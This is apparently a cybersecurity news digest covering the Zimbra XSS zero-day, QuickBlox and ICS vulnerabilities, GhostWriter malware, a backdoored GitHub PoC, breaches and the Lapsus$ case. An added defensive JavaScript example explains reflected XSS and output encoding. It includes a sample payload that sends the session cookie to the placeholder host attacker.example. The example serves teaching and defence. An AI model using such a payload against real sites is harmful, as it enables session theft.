The latest in cybersecurity: Rockwell, QuickBlox, Zimbra, Honeywell, GhostWriter, Ukraine, GitHub, NRC, PBI, MOVEit, Nigeria, iPhone ban, Russia, Lapsus$, USB.
Researchers from Claroty Team82 and Check Point Research (CPR) have uncovered critical vulnerabilities in the widely used QuickBlox SDK and API. These vulnerabilities pose a significant risk to industries such as telemedicine, smart IoT, and finance, potentially exposing sensitive user information. The researchers developed proof-of-concept exploits that demonstrated the ability to remotely open doors, leak patient data, and compromise user credentials.
Zimbra Collaboration Suite (ZCS), a widely adopted email and collaboration platform, is facing an actively exploited zero-day vulnerability that targets and compromises email servers. Over 200,000 businesses across 140 countries, including government and financial organizations, currently use ZCS. The vulnerability, a reflected Cross-Site Scripting (XSS) flaw, was discovered while being exploited in a targeted attack; it lets threat actors run script of their choosing in a victim's browser session, and from there steal sensitive user information or take actions as that user.
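To make the class of bug concrete, here is an added example of how a reflected XSS flaw arises and how output encoding removes it. This is illustrative code written for this page, not Zimbra's code, and says nothing about the specific Zimbra endpoint; the `q` parameter, the renderer names and the payload are all constructed for the demonstration.

```javascript
// Added example (not Zimbra's code): reflected XSS in a server-side HTML renderer.
// Reflected XSS occurs when a request parameter is echoed straight into the
// response body. The hypothetical renderers below take a "q" search term.

// Hypothetical vulnerable renderer: the raw parameter lands in HTML text context.
function renderSearchVulnerable(q) {
  return `<h1>Results for: ${q}</h1>`;
}

// Encode the characters that let untrusted text break out of HTML text context.
// This is correct for text between tags; attribute, JavaScript and URL contexts
// need their own context-specific encoding.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened renderer: identical output shape, but the parameter is encoded first.
function renderSearchSafe(q) {
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

// Minimal check a test suite or scanner can apply: does the rendered response
// still contain the injected markup byte-for-byte (i.e. unencoded)?
function reflectsUnencoded(render, payload) {
  return render(payload).includes(payload);
}

// Constructed payload of the kind a phishing link to a vulnerable endpoint would
// carry: an image tag whose error handler exfiltrates the session cookie.
// The attacker host is a placeholder, not a real indicator.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Summary of both renderers against the payload; used by the checks below.
function compareRenderers() {
  return {
    vulnerable: reflectsUnencoded(renderSearchVulnerable, PAYLOAD), // true
    hardened: reflectsUnencoded(renderSearchSafe, PAYLOAD),         // false
    hardenedOutput: renderSearchSafe(PAYLOAD),
  };
}
```

Calling `compareRenderers()` shows the vulnerable renderer returning the payload intact while the hardened one returns `&lt;img src=x onerror=&quot;...` as inert text. Note that the fix is per-context: encoding for text content does not protect a value inserted into a `href`, an inline event handler, or a `<script>` block, which is why templating engines that auto-escape by context are preferable to hand-rolled string replacement.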
Government entities, military organizations, and civilian users in Ukraine and Poland have fallen victim to a series of sophisticated campaigns aimed at stealing sensitive data and establishing persistent remote access to compromised systems. The attackers, known as GhostWriter, utilize phishing tactics and decoy documents to distribute PicassoLoader malware, which serves as a conduit for launching Cobalt Strike Beacon and njRAT. The attacks involve multi-stage infection chains initiated through malicious Microsoft Office documents and employ various evasion techniques, including embedding payloads in image files. GhostWriter’s activities align with the priorities of the Belarusian government and have been ongoing since April 2022.
A proof-of-concept (PoC) found on GitHub has been discovered to contain a backdoor with a crafty persistence method, posing as a harmless learning tool. The PoC is in fact a downloader: it fetches and executes a Linux bash script while presenting itself as a kernel-level process to conceal its malicious activity. The repository initially posed as a PoC for a recently disclosed Linux kernel flaw and was eventually taken down, but not before being forked 25 times.
An advanced persistent threat (APT) group has identified vulnerabilities in Rockwell Automation products that could potentially disrupt critical infrastructure organizations. The flaws, CVE-2023-3595 and CVE-2023-3596, affect ControlLogix EtherNet/IP communication modules and can enable remote code execution and denial-of-service attacks. Rockwell Automation has released firmware patches and shared indicators of compromise, while the US Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory to raise awareness about the vulnerabilities. Although no exploitation has been detected, the potential risk to critical infrastructure remains a concern.
Cybersecurity company Armis has uncovered critical vulnerabilities in Honeywell’s distributed control system (DCS) products, posing a risk to industrial organizations. The nine vulnerabilities, dubbed ‘Crit.IX,’ were disclosed by Armis researchers and subsequently patched by Honeywell. The flaws, which impact various Experion DCS platforms, could allow attackers to launch denial-of-service attacks, gain unauthorized access to sensitive information, or execute remote code on controllers and servers, potentially leading to production downtime or damage to industrial equipment. Armis previously identified vulnerabilities in other ICS products, emphasizing the need for robust security measures in industrial environments.
The Norwegian Refugee Council (NRC) has revealed that it experienced a cyberattack targeting its online database containing personal information of project participants. The NRC swiftly suspended the database and initiated an external forensic investigation to assess the extent of the attack. While specific details of the attack and the perpetrators remain undisclosed, the NRC emphasized the importance of safeguarding the data of vulnerable individuals in need of humanitarian assistance.
Pension Benefit Information, LLC (PBI) recently disclosed a data breach that occurred due to a vulnerability in their MOVEit file-transfer software. Unauthorized access resulted in the exposure of sensitive consumer information, including names, addresses, Social Security numbers, and dates of birth. PBI has taken swift action, notifying affected individuals and initiating an investigation into the incident. If you have received a data breach notification from PBI, it is crucial to understand the risks involved and take appropriate measures to protect yourself from potential fraud or identity theft.
The Bangkok Post, along with numerous internet service users, fell victim to a rare ransomware attack, resulting in the inaccessibility of their website. Internet Thailand (Inet) Plc, the service provider, reported the attack on its hypervisor management system, impacting 300 out of its 2,500 clients. Inet is working diligently to restore services to all affected parties by the end of Wednesday.
The official website of the Ogun state government in Nigeria fell victim to a cyberattack conducted by hackers claiming to be from the Maldives. The attack, which was discovered on Wednesday, resulted in the defacement of all website pages. The hackers, going by the name “Anon Ghost,” left their mark by displaying their logo and a bold inscription on the compromised site.
The Russian government is contemplating a ban on the use of iPhones by government employees following suspicions of an American intelligence campaign exploiting vulnerabilities to spy on Russian staff. The ban, set to commence on Monday, will initially affect employees at the Ministry of Industry and Trade, with other government departments to follow suit. The move comes after the discovery of thousands of iPhones infected with spyware, leading to accusations of collaboration between Apple and the U.S. National Security Agency.
The Office of the National Cyber Director (ONCD) has released a comprehensive implementation plan for its ambitious national cybersecurity strategy. The plan outlines specific initiatives and deadlines for 18 government agencies, aiming to strengthen cybersecurity regulation, enhance corporate responsibility, combat cybercrime, and build a skilled cyber workforce.
A new report by Mandiant reveals a significant rise in USB-delivered malware, with two major campaigns named ‘Sogu’ and ‘Snowydrive’ observed in 2023. These campaigns, attributed to threat groups TEMP.HEX and UNC4698, respectively, target industries worldwide, aiming to steal sensitive data. The Sogu campaign, considered the most aggressive USB-assisted cyber-espionage operation, has victims across various sectors and countries. Its malware, known as ‘Korplug’ (also tracked as PlugX), establishes persistence, conducts system reconnaissance, and exfiltrates valuable files to a command-and-control server. The Snowydrive campaign, meanwhile, infects computers through a backdoor that allows attackers to execute arbitrary payloads, modify the registry, and propagate through USB drives.
The current acting director of the Office of the National Cyber Director (ONCD) has been informed that she will not receive the nomination for the permanent position, raising concerns about the agency’s effectiveness and influence. Kemba Walden, who has played a crucial role in establishing the ONCD, received the news recently, leaving the agency’s leadership in uncertainty. The decision comes after the departure of Chris Inglis, the first National Cyber Director, and Rob Knake, the deputy director overseeing the national cybersecurity strategy.
British prosecutors have accused two teenagers, identified as Arion Kurtaj and an unnamed 17-year-old, of hacking into companies such as Revolut, Uber, and Rockstar as part of the now-inactive Lapsus$ hacking group. The hackers exposed personal data of thousands of Revolut users and leaked unreleased game footage from Rockstar. The duo also targeted Microsoft, Nvidia Corp., Okta, and conducted cryptocurrency scams using fraudulent SIM cards. With their IP addresses traced, the teenagers now face charges including blackmail, fraud, and violations under the Computer Misuse Act.